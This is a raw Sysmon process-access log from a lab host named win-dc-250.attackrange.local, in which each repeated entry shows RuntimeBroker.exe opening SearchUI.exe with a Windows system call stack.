13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 